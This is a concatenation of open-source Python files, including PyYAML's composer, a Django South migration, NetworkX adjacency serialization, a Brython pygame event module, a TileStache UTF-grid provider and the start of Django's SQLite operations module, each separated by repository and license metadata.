interceptions = models.PositiveIntegerField()
attempts_per_interception = models.FloatField()
yards = models.PositiveIntegerField()
yards_per_attempt = models.FloatField()
touchdowns = models.PositiveIntegerField()
attempts_per_touchdown = models.FloatField()
rating = models.FloatField()
def __unicode__(self):
return self.player.name
| apache-2.0 |
f-guichard/cf-sample-php-buildpack-custo | lib/yaml/composer.py | 534 | 4921 |
__all__ = ['Composer', 'ComposerError']
from error import MarkedYAMLError
from events import *
from nodes import *
class ComposerError(MarkedYAMLError):
pass
class Composer(object):
def __init__(self):
self.anchors = {}
def check_node(self):
# Drop the STREAM-START event.
if self.check_event(StreamStartEvent):
self.get_event()
# If there are more documents available?
return not self.check_event(StreamEndEvent)
def get_node(self):
# Get the root node of the next document.
if not self.check_event(StreamEndEvent):
return self.compose_document()
def get_single_node(self):
# Drop the STREAM-START event.
self.get_event()
# Compose a document if the stream is not empty.
document = None
if not self.check_event(StreamEndEvent):
document = self.compose_document()
# Ensure that the stream contains no more documents.
if not self.check_event(StreamEndEvent):
event = self.get_event()
raise ComposerError("expected a single document in the stream",
document.start_mark, "but found another document",
event.start_mark)
# Drop the STREAM-END event.
self.get_event()
return document
def compose_document(self):
# Drop the DOCUMENT-START event.
self.get_event()
# Compose the root node.
node = self.compose_node(None, None)
# Drop the DOCUMENT-END event.
self.get_event()
self.anchors = {}
return node
def compose_node(self, parent, index):
if self.check_event(AliasEvent):
event = self.get_event()
anchor = event.anchor
if anchor not in self.anchors:
raise ComposerError(None, None, "found undefined alias %r"
% anchor.encode('utf-8'), event.start_mark)
return self.anchors[anchor]
event = self.peek_event()
anchor = event.anchor
if anchor is not None:
if anchor in self.anchors:
raise ComposerError("found duplicate anchor %r; first occurence"
% anchor.encode('utf-8'), self.anchors[anchor].start_mark,
"second occurence", event.start_mark)
self.descend_resolver(parent, index)
if self.check_event(ScalarEvent):
node = self.compose_scalar_node(anchor)
elif self.check_event(SequenceStartEvent):
node = self.compose_sequence_node(anchor)
elif self.check_event(MappingStartEvent):
node = self.compose_mapping_node(anchor)
self.ascend_resolver()
return node
def compose_scalar_node(self, anchor):
event = self.get_event()
tag = event.tag
if tag is None or tag == u'!':
tag = self.resolve(ScalarNode, event.value, event.implicit)
node = ScalarNode(tag, event.value,
event.start_mark, event.end_mark, style=event.style)
if anchor is not None:
self.anchors[anchor] = node
return node
def compose_sequence_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == u'!':
tag = self.resolve(SequenceNode, None, start_event.implicit)
node = SequenceNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
index = 0
while not self.check_event(SequenceEndEvent):
node.value.append(self.compose_node(node, index))
index += 1
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
def compose_mapping_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == u'!':
tag = self.resolve(MappingNode, None, start_event.implicit)
node = MappingNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
while not self.check_event(MappingEndEvent):
#key_event = self.peek_event()
item_key = self.compose_node(node, None)
#if item_key in node.value:
# raise ComposerError("while composing a mapping", start_event.start_mark,
# "found duplicate key", key_event.start_mark)
item_value = self.compose_node(node, item_key)
#node.value[item_key] = item_value
node.value.append((item_key, item_value))
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
| apache-2.0 |
martinburchell/econsensus | django/econsensus/publicweb/migrations/0020_auto__add_field_feedback_author.py | 4 | 6315 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Feedback.author'
db.add_column('publicweb_feedback', 'author', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='publicweb_feedback_related', null=True, to=orm['auth.User']), keep_default=False)
def backwards(self, orm):
# Deleting field 'Feedback.author'
db.delete_column('publicweb_feedback', 'author_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'publicweb.decision': {
'Meta': {'object_name': 'Decision'},
'archived_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'publicweb_decision_related'", 'null': 'True', 'to': "orm['auth.User']"}),
'budget': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'created_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'deadline': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'decided_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'effective_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'excerpt': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'people': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'review_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('tagging.fields.TagField', [], {'null': 'True'}),
'watchers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'})
},
'publicweb.feedback': {
'Meta': {'object_name': 'Feedback'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'publicweb_feedback_related'", 'null': 'True', 'to': "orm['auth.User']"}),
'decision': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['publicweb.Decision']"}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'resolved': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
}
}
complete_apps = ['publicweb']
| gpl-3.0 |
ionanrozenfeld/networkx | networkx/readwrite/json_graph/adjacency.py | 17 | 4891 | # Copyright (C) 2011-2013 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
from itertools import chain, count
import networkx as nx
__author__ = """Aric Hagberg <aric.hagberg@gmail.com>"""
__all__ = ['adjacency_data', 'adjacency_graph']
_attrs = dict(id='id', key='key')
def adjacency_data(G, attrs=_attrs):
"""Return data in adjacency format that is suitable for JSON serialization
and use in Javascript documents.
Parameters
----------
G : NetworkX graph
attrs : dict
A dictionary that contains two keys 'id' and 'key'. The corresponding
values provide the attribute names for storing NetworkX-internal graph
data. The values should be unique. Default value:
:samp:`dict(id='id', key='key')`.
If some user-defined graph data use these attribute names as data keys,
they may be silently dropped.
Returns
-------
data : dict
A dictionary with adjacency formatted data.
Raises
------
NetworkXError
If values in attrs are not unique.
Examples
--------
>>> from networkx.readwrite import json_graph
>>> G = nx.Graph([(1,2)])
>>> data = json_graph.adjacency_data(G)
To serialize with json
>>> import json
>>> s = json.dumps(data)
Notes
-----
Graph, node, and link attributes will be written when using this format
but attribute keys must be strings if you want to serialize the resulting
data with JSON.
The default value of attrs will be changed in a future release of NetworkX.
See Also
--------
adjacency_graph, node_link_data, tree_data
"""
multigraph = G.is_multigraph()
id_ = attrs['id']
# Allow 'key' to be omitted from attrs if the graph is not a multigraph.
key = None if not multigraph else attrs['key']
if id_ == key:
raise nx.NetworkXError('Attribute names are not unique.')
data = {}
data['directed'] = G.is_directed()
data['multigraph'] = multigraph
data['graph'] = list(G.graph.items())
data['nodes'] = []
data['adjacency'] = []
for n, nbrdict in G.adjacency():
data['nodes'].append(dict(chain(G.node[n].items(), [(id_, n)])))
adj = []
if multigraph:
for nbr, keys in nbrdict.items():
for k, d in keys.items():
adj.append(dict(chain(d.items(), [(id_, nbr), (key, k)])))
else:
for nbr, d in nbrdict.items():
adj.append(dict(chain(d.items(), [(id_, nbr)])))
data['adjacency'].append(adj)
return data
def adjacency_graph(data, directed=False, multigraph=True, attrs=_attrs):
"""Return graph from adjacency data format.
Parameters
----------
data : dict
Adjacency list formatted graph data
Returns
-------
G : NetworkX graph
A NetworkX graph object
directed : bool
If True, and direction not specified in data, return a directed graph.
multigraph : bool
If True, and multigraph not specified in data, return a multigraph.
attrs : dict
A dictionary that contains two keys 'id' and 'key'. The corresponding
values provide the attribute names for storing NetworkX-internal graph
data. The values should be unique. Default value:
:samp:`dict(id='id', key='key')`.
Examples
--------
>>> from networkx.readwrite import json_graph
>>> G = nx.Graph([(1,2)])
>>> data = json_graph.adjacency_data(G)
>>> H = json_graph.adjacency_graph(data)
Notes
-----
The default value of attrs will be changed in a future release of NetworkX.
See Also
--------
adjacency_graph, node_link_data, tree_data
"""
multigraph = data.get('multigraph', multigraph)
directed = data.get('directed', directed)
if multigraph:
graph = nx.MultiGraph()
else:
graph = nx.Graph()
if directed:
graph = graph.to_directed()
id_ = attrs['id']
# Allow 'key' to be omitted from attrs if the graph is not a multigraph.
key = None if not multigraph else attrs['key']
graph.graph = dict(data.get('graph', []))
mapping = []
for d in data['nodes']:
node_data = d.copy()
node = node_data.pop(id_)
mapping.append(node)
graph.add_node(node, attr_dict=node_data)
for i, d in enumerate(data['adjacency']):
source = mapping[i]
for tdata in d:
target_data = tdata.copy()
target = target_data.pop(id_)
if not multigraph:
graph.add_edge(source, target, attr_dict=tdata)
else:
ky = target_data.pop(key, None)
graph.add_edge(source, target, key=ky, attr_dict=tdata)
return graph
| bsd-3-clause |
40223144/2015cdafinal | static/Brython3.1.0-20150301-090019/Lib/site-packages/pygame/event.py | 603 | 19086 | #!/usr/bin/env python
'''Pygame module for interacting with events and queues.
Pygame handles all it's event messaging through an event queue. The routines
in this module help you manage that event queue. The input queue is heavily
dependent on the pygame display module. If the display has not been
initialized and a video mode not set, the event queue will not really work.
The queue is a regular queue of Event objects, there are a variety of ways
to access the events it contains. From simply checking for the existance of
events, to grabbing them directly off the stack.
All events have a type identifier. This event type is in between the values
of NOEVENT and NUMEVENTS. All user defined events can have the value of
USEREVENT or higher. It is recommended make sure your event id's follow this
system.
To get the state of various input devices, you can forego the event queue
and access the input devices directly with their appropriate modules; mouse,
key, and joystick. If you use this method, remember that pygame requires some
form of communication with the system window manager and other parts of the
platform. To keep pygame in synch with the system, you will need to call
pygame.event.pump() to keep everything current. You'll want to call this
function usually once per game loop.
The event queue offers some simple filtering. This can help performance
slightly by blocking certain event types from the queue, use the
pygame.event.set_allowed() and pygame.event.set_blocked() to work with
this filtering. All events default to allowed.
Joysticks will not send any events until the device has been initialized.
An Event object contains an event type and a readonly set of member data.
The Event object contains no method functions, just member data. Event
objects are retrieved from the pygame event queue. You can create your
own new events with the pygame.event.Event() function.
Your program must take steps to keep the event queue from overflowing. If the
program is not clearing or getting all events off the queue at regular
intervals, it can overflow. When the queue overflows an exception is thrown.
All Event objects contain an event type identifier in the Event.type member.
You may also get full access to the Event's member data through the Event.dict
method. All other member lookups will be passed through to the Event's
dictionary values.
While debugging and experimenting, you can print the Event objects for a
quick display of its type and members. Events that come from the system
will have a guaranteed set of member items based on the type. Here is a
list of the Event members that are defined with each type.
QUIT
(none)
ACTIVEEVENT
gain, state
KEYDOWN
unicode, key, mod
KEYUP
key, mod
MOUSEMOTION
pos, rel, buttons
MOUSEBUTTONUP
pos, button
MOUSEBUTTONDOWN
pos, button
JOYAXISMOTION
joy, axis, value
JOYBALLMOTION
joy, ball, rel
JOYHATMOTION
joy, hat, value
JOYBUTTONUP
joy, button
JOYBUTTONDOWN
joy, button
VIDEORESIZE
size, w, h
VIDEOEXPOSE
(none)
USEREVENT
code
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from copy import copy
#from ctypes import * #brython
from SDL import *
import pygame.base
import pygame.locals
import pygame.display
def pump():
'''Internally process pygame event handlers.
For each frame of your game, you will need to make some sort of call to
the event queue. This ensures your program can internally interact with
the rest of the operating system. If you are not using other event
functions in your game, you should call pygame.event.pump() to allow
pygame to handle internal actions.
This function is not necessary if your program is consistently processing
events on the queue through the other pygame.event functions.
There are important things that must be dealt with internally in the event
queue. The main window may need to be repainted or respond to the system.
If you fail to make a call to the event queue for too long, the system may
decide your program has locked up.
'''
pygame.display._video_init_check()
SDL_PumpEvents()
def get(typelist=None):
'''Get events from the queue.
pygame.event.get(): return Eventlist
pygame.event.get(type): return Eventlist
pygame.event.get(typelist): return Eventlist
This will get all the messages and remove them from the queue. If a type
or sequence of types is given only those messages will be removed from the
queue.
If you are only taking specific events from the queue, be aware that the
queue could eventually fill up with the events you are not interested.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types that can be returned.
:rtype: list of `Event`
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = int(typelist)
SDL_PumpEvents()
events = []
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
while new_events:
events.append(Event(0, sdl_event=new_events[0]))
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
return events
def poll():
'''Get a single event from the queue.
Returns a single event from the queue. If the event queue is empty an event
of type pygame.NOEVENT will be returned immediately. The returned event is
removed from the queue.
:rtype: Event
'''
pygame.display._video_init_check()
event = SDL_PollEventAndReturn()
if event:
return Event(0, sdl_event=event, keep_userdata=True)
else:
return Event(pygame.locals.NOEVENT)
def wait():
'''Wait for a single event from the queue.
Returns a single event from the queue. If the queue is empty this function
will wait until one is created. While the program is waiting it will sleep
in an idle state. This is important for programs that want to share the
system with other applications.
:rtype: Event
'''
pygame.display._video_init_check()
return Event(0, sdl_event=SDL_WaitEventAndReturn())
def peek(typelist=None):
'''Test if event types are waiting on the queue.
Returns true if there are any events of the given type waiting on the
queue. If a sequence of event types is passed, this will return True if
any of those events are on the queue.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types to look for.
:rtype: bool
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = SDL_EVENTMASK(int(typelist))
SDL_PumpEvents()
events = SDL_PeepEvents(1, SDL_PEEKEVENT, mask)
if typelist is None:
if events:
return Event(0, sdl_event=events[0], keep_userdata=True)
else:
return Event(pygame.locals.NOEVENT) # XXX deviation from pygame
return len(events) > 0
def clear(typelist=None):
'''Remove all events from the queue.
Remove all events or events of a specific type from the queue. This has the
same effect as `get` except nothing is returned. This can be slightly more
effecient when clearing a full event queue.
:Parameters:
`typelist` : int or sequence of int
Event type or list of event types to remove.
'''
pygame.display._video_init_check()
if typelist is None:
mask = SDL_ALLEVENTS
else:
if hasattr(typelist, '__len__'):
mask = reduce(lambda a,b: a | SDL_EVENTMASK(b), typelist, 0)
else:
mask = int(typelist)
SDL_PumpEvents()
events = []
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
while new_events:
new_events = SDL_PeepEvents(1, SDL_GETEVENT, mask)
_event_names = {
SDL_ACTIVEEVENT: 'ActiveEvent',
SDL_KEYDOWN: 'KeyDown',
SDL_KEYUP: 'KeyUp',
SDL_MOUSEMOTION: 'MouseMotion',
SDL_MOUSEBUTTONDOWN:'MouseButtonDown',
SDL_MOUSEBUTTONUP: 'MouseButtonUp',
SDL_JOYAXISMOTION: 'JoyAxisMotion',
SDL_JOYBALLMOTION: 'JoyBallMotion',
SDL_JOYHATMOTION: 'JoyHatMotion',
SDL_JOYBUTTONUP: 'JoyButtonUp',
SDL_JOYBUTTONDOWN: 'JoyButtonDown',
SDL_QUIT: 'Quit',
SDL_SYSWMEVENT: 'SysWMEvent',
SDL_VIDEORESIZE: 'VideoResize',
SDL_VIDEOEXPOSE: 'VideoExpose',
SDL_NOEVENT: 'NoEvent'
}
def event_name(event_type):
'''Get the string name from an event id.
Pygame uses integer ids to represent the event types. If you want to
report these types to the user they should be converted to strings. This
will return a the simple name for an event type. The string is in the
CamelCase style.
:Parameters:
- `event_type`: int
:rtype: str
'''
if event_type >= SDL_USEREVENT and event_type < SDL_NUMEVENTS:
return 'UserEvent'
return _event_names.get(event_type, 'Unknown')
def set_blocked(typelist):
'''Control which events are allowed on the queue.
The given event types are not allowed to appear on the event queue. By
default all events can be placed on the queue. It is safe to disable an
event type multiple times.
If None is passed as the argument, this has the opposite effect and none of
the event types are allowed to be placed on the queue.
:note: events posted with `post` will not be blocked.
:Parameters:
`typelist` : int or sequence of int or None
Event type or list of event types to disallow.
'''
pygame.display._video_init_check()
if typelist is None:
SDL_EventState(SDL_ALLEVENTS, SDL_IGNORE)
elif hasattr(typelist, '__len__'):
for val in typelist:
SDL_EventState(val, SDL_IGNORE)
else:
SDL_EventState(typelist, SDL_IGNORE)
def set_allowed(typelist):
'''Control which events are allowed on the queue.
The given event types are allowed to appear on the event queue. By default
all events can be placed on the queue. It is safe to enable an event type
multiple times.
If None is passed as the argument, this has the opposite effect and all of
the event types are allowed to be placed on the queue.
:Parameters:
`typelist` : int or sequence of int or None
Event type or list of event types to disallow.
'''
pygame.display._video_init_check()
if typelist is None:
SDL_EventState(SDL_ALLEVENTS, SDL_ENABLE)
elif hasattr(typelist, '__len__'):
for val in typelist:
SDL_EventState(val, SDL_ENABLE)
else:
SDL_EventState(typelist, SDL_ENABLE)
def get_blocked(typelist):
'''Test if a type of event is blocked from the queue.
Returns true if the given event type is blocked from the queue.
:Parameters:
- `event_type`: int
:rtype: int
'''
pygame.display._video_init_check()
if typelist == None:
return SDL_EventState(SDL_ALLEVENTS, SDL_QUERY) == SDL_ENABLE
elif hasattr(typelist, '__len__'): # XXX undocumented behaviour
for val in typelist:
if SDL_EventState(val, SDL_QUERY) == SDL_ENABLE:
return True
return False
else:
return SDL_EventState(typelist, SDL_QUERY) == SDL_ENABLE
def set_grab(grab):
'''Control the sharing of input devices with other applications.
When your program runs in a windowed environment, it will share the mouse
and keyboard devices with other applications that have focus. If your
program sets the event grab to True, it will lock all input into your
program.
It is best to not always grab the input, since it prevents the user from
doing other things on their system.
:Parameters:
- `grab`: bool
'''
pygame.display._video_init_check()
if grab:
SDL_WM_GrabInput(SDL_GRAB_ON)
else:
SDL_WM_GrabInput(SDL_GRAB_OFF)
def get_grab():
'''Test if the program is sharing input devices.
Returns true when the input events are grabbed for this application. Use
`set_grab` to control this state.
:rtype: bool
'''
pygame.display._video_init_check()
return SDL_WM_GrabInput(SDL_GRAB_QUERY) == SDL_GRAB_ON
_USEROBJECT_CHECK1 = int(0xdeadbeef) # signed
_USEROBJECT_CHECK2 = 0xfeedf00d
_user_event_objects = {}
_user_event_nextid = 1
def post(event):
'''Place a new event on the queue.
This places a new event at the end of the event queue. These Events will
later be retrieved from the other queue functions.
This is usually used for placing pygame.USEREVENT events on the queue.
Although any type of event can be placed, if using the sytem event types
your program should be sure to create the standard attributes with
appropriate values.
:Parameters:
`event` : Event
Event to add to the queue.
'''
global _user_event_nextid
pygame.display._video_init_check()
sdl_event = SDL_Event(event.type)
sdl_event.user.code = _USEROBJECT_CHECK1
sdl_event.user.data1 = c_void_p(_USEROBJECT_CHECK2)
sdl_event.user.data2 = c_void_p(_user_event_nextid)
_user_event_objects[_user_event_nextid] = event
_user_event_nextid += 1
SDL_PushEvent(sdl_event)
class Event:
def __init__(self, event_type, event_dict=None, sdl_event=None,
keep_userdata=False, **attributes):
'''Create a new event object.
Creates a new event with the given type. The event is created with the
given attributes and values. The attributes can come from a dictionary
argument, or as string keys from a dictionary.
The given attributes will be readonly attributes on the new event
object itself. These are the only attributes on the Event object,
there are no methods attached to Event objects.
:Parameters:
`event_type` : int
Event type to create
`event_dict` : dict
Dictionary of attributes to assign.
`sdl_event` : `SDL_Event`
Construct a Pygame event from the given SDL_Event; used
internally.
`keep_userdata` : bool
Used internally.
`attributes` : additional keyword arguments
Additional attributes to assign to the event.
'''
if sdl_event:
uevent = cast(pointer(sdl_event), POINTER(SDL_UserEvent)).contents
if uevent.code == _USEROBJECT_CHECK1 and \
uevent.data1 == _USEROBJECT_CHECK2 and \
uevent.data2 in _user_event_objects:
# An event that was posted; grab dict from local store.
id = sdl_event.data2
for key, value in _user_event_objects[id].__dict__.items():
setattr(self, key, value)
# Free memory unless just peeking
if not keep_userdata:
del _user_event_objects[id]
else:
# Standard SDL event
self.type = sdl_event.type
if self.type == SDL_QUIT:
pass
elif self.type == SDL_ACTIVEEVENT:
self.gain = sdl_event.gain
self.state = sdl_event.state
elif self.type == SDL_KEYDOWN:
self.unicode = sdl_event.keysym.unicode
self.key = sdl_event.keysym.sym
self.mod = sdl_event.keysym.mod
elif self.type == SDL_KEYUP:
self.key = sdl_event.keysym.sym
self.mod = sdl_event.keysym.mod
elif self.type == SDL_MOUSEMOTION:
self.pos = (sdl_event.x, sdl_event.y)
self.rel = (sdl_event.xrel, sdl_event.yrel)
self.buttons = (sdl_event.state & SDL_BUTTON(1) != 0,
sdl_event.state & SDL_BUTTON(2) != 0,
sdl_event.state & SDL_BUTTON(3) != 0)
elif self.type in (SDL_MOUSEBUTTONDOWN, SDL_MOUSEBUTTONUP):
self.pos = (sdl_event.x, sdl_event.y)
self.button = sdl_event.button
elif self.type == SDL_JOYAXISMOTION:
self.joy = sdl_event.which
self.axis = sdl_event.axis
self.value = sdl_event.value / 32767.0
elif self.type == SDL_JOYBALLMOTION:
self.joy = sdl_event.which
self.ball = sdl_event.ball
self.rel = (sdl_event.xrel, sdl_event.yrel)
elif self.type == SDL_JOYHATMOTION:
self.joy = sdl_event.which
self.hat = sdl_event.hat
hx = hy = 0
if sdl_event.value & SDL_HAT_UP:
hy = 1
if sdl_event.value & SDL_HAT_DOWN:
hy = -1
if sdl_event.value & SDL_HAT_RIGHT:
hx = 1
if sdl_event.value & SDL_HAT_LEFT:
hx = -1
self.value = (hx, hy)
elif self.type in (SDL_JOYBUTTONUP, SDL_JOYBUTTONDOWN):
self.joy = sdl_event.which
self.button = sdl_event.button
elif self.type == SDL_VIDEORESIZE:
self.size = (sdl_event.w, sdl_event.h)
self.w = sdl_event.w
self.h = sdl_event.h
elif self.type == SDL_VIDEOEXPOSE:
pass
elif self.type == SDL_SYSWMEVENT:
pass ### XXX: not implemented
elif self.type >= SDL_USEREVENT and self.type < SDL_NUMEVENTS:
self.code = sdl_event.code
else:
# Create an event (not from event queue)
self.type = event_type
if event_dict:
for key, value in event_dict.items():
setattr(self, key, value)
for key, value in attributes.items():
setattr(self, key, value)
# Bizarre undocumented but used by some people.
self.dict = self.__dict__
def __repr__(self):
d = copy(self.__dict__)
del d['type']
return '<Event(%d-%s %r)>' % \
(self.type, event_name(self.type), d)
def __nonzero__(self):
return self.type != SDL_NOEVENT
EventType = Event
| gpl-3.0 |
kartta-labs/mapwarper | lib/tilestache/TileStache-1.51.5/TileStache/Goodies/Providers/UtfGridCompositeOverlap.py | 13 | 4055 | import json
import TileStache
from TileStache.Core import KnownUnknown
class Provider:
def __init__(self, layer, stack, layer_id=None, wrapper=None):
#Set up result storage
self.resultGrid = []
self.gridKeys = []
self.gridData = {}
self.layer = layer
self.stack = stack
self.layer_id = layer_id
self.wrapper = wrapper
self.curId = 0
def renderTile(self, width, height, srs, coord):
for l in self.stack:
self.addLayer(l, coord)
return SaveableResponse(self.writeResult())
def getTypeByExtension(self, extension):
""" Get mime-type and format by file extension.
This only accepts "json".
"""
if extension.lower() != 'json':
raise KnownUnknown('UtfGridComposite only makes .json tiles, not "%s"' % extension)
return 'text/json', 'JSON'
def addLayer( self, layerDef, coord ):
layer = TileStache.getTile(self.layer.config.layers[layerDef['src']], coord, 'JSON')[1]
if layerDef['wrapper'] == None:
layer = json.loads(layer)
else:
# Strip "Wrapper(...)"
layer = json.loads(layer[(len(layerDef['wrapper'])+1):-1])
grid_size = len(layer['grid'])
# Init resultGrid based on given layers (if required)
if len(self.resultGrid) == 0:
for i in xrange(grid_size):
self.resultGrid.append([])
for j in xrange(grid_size):
self.resultGrid[i].append(-1)
layer_keys = layer['keys']
for y in xrange(grid_size):
line = layer['grid'][y]
for x in xrange(grid_size):
src_id = self.decodeId(line[x])
if layer_keys[src_id] == "":
continue
src_key = layer_keys[src_id]
# Add layer name attribute
if layerDef['layer_id'] != None and self.layer_id != None:
layer['data'][src_key][self.layer_id] = layerDef['layer_id']
if self.resultGrid[x][y] == -1:
cur_id = self.curId
self.curId += 1
cur_key = json.dumps(cur_id)
# Set key for current point.
self.resultGrid[x][y] = self.encodeId(cur_id)
self.gridKeys.insert(cur_id + 1, cur_key)
# Initialize data bucket.
self.gridData[cur_key] = []
else:
cur_id = self.decodeId(self.resultGrid[x][y])
cur_key = json.dumps(cur_id)
self.gridData[cur_key].append(layer['data'][src_key])
def writeResult( self ):
result = "{\"keys\": ["
for i in xrange(len(self.gridKeys)):
if i > 0:
result += ","
result += "\"" + self.gridKeys[i] + "\""
result += "], \"data\": { "
first = True
for key in self.gridData:
if not first:
result += ","
first = False
result += "\"" + key + "\": " + json.dumps(self.gridData[key]) + ""
result += "}, \"grid\": ["
grid_size = len(self.resultGrid)
first = True
for y in xrange(grid_size):
line = ""
for x in xrange(grid_size):
if self.resultGrid[x][y] == -1:
self.resultGrid[x][y] = ' '
line = line + self.resultGrid[x][y]
if not first:
result += ","
first = False
result += json.dumps(line)
if self.wrapper == None:
return result + "]}"
else:
return self.wrapper + "(" + result + "]})"
def encodeId ( self, id ):
id += 32
if id >= 34:
id = id + 1
if id >= 92:
id = id + 1
if id > 127:
return unichr(id)
return chr(id)
def decodeId( self, id ):
id = ord(id)
if id >= 93:
id = id - 1
if id >= 35:
id = id - 1
return id - 32
class SaveableResponse:
""" Wrapper class for JSON response that makes it behave like a PIL.Image object.
TileStache.getTile() expects to be able to save one of these to a buffer.
"""
def __init__(self, content):
self.content = content
def save(self, out, format):
if format != 'JSON':
raise KnownUnknown('UtfGridCompositeOverlap only saves .json tiles, not "%s"' % format)
out.write(self.content)
| mit |
JorgeCoock/django | django/db/backends/sqlite3/operations.py | 180 | 9372 | from __future__ import unicode_literals
import datetime
import uuid
from django.conf import settings
from django.core.exceptions import FieldError, ImproperlyConfigured
from django.db import utils
from django.db.backends import utils as backend_utils
from django.db.backends.base.operations import BaseDatabaseOperations
from django.db.models import aggregates, fields
from django.utils import six, timezone
from django.utils.dateparse import parse_date, parse_datetime, parse_time
from django.utils.duration import duration_string
try:
import pytz
except ImportError:
pytz = None
class DatabaseOperations(BaseDatabaseOperations):
def bulk_batch_size(self, fields, objs):
"""
SQLite has a compile-time default (SQLITE_LIMIT_VARIABLE_NUMBER) of
999 variables per query.
If there is just single field to insert, then we can hit another
limit, SQLITE_MAX_COMPOUND_SELECT which defaults to 500.
"""
limit = 999 if len(fields) > 1 else 500
return (limit // len(fields)) if len(fields) > 0 else len(objs)
def check_expression_support(self, expression):
bad_fields = (fields.DateField, fields.DateTimeField, fields.TimeField)
bad_aggregates = (aggregates.Sum, aggregates.Avg, aggregates.Variance, aggregates.StdDev)
if isinstance(expression, bad_aggregates):
for expr in expression.get_source_expressions():
try:
output_field = expr.output_field
if isinstance(output_field, bad_fields):
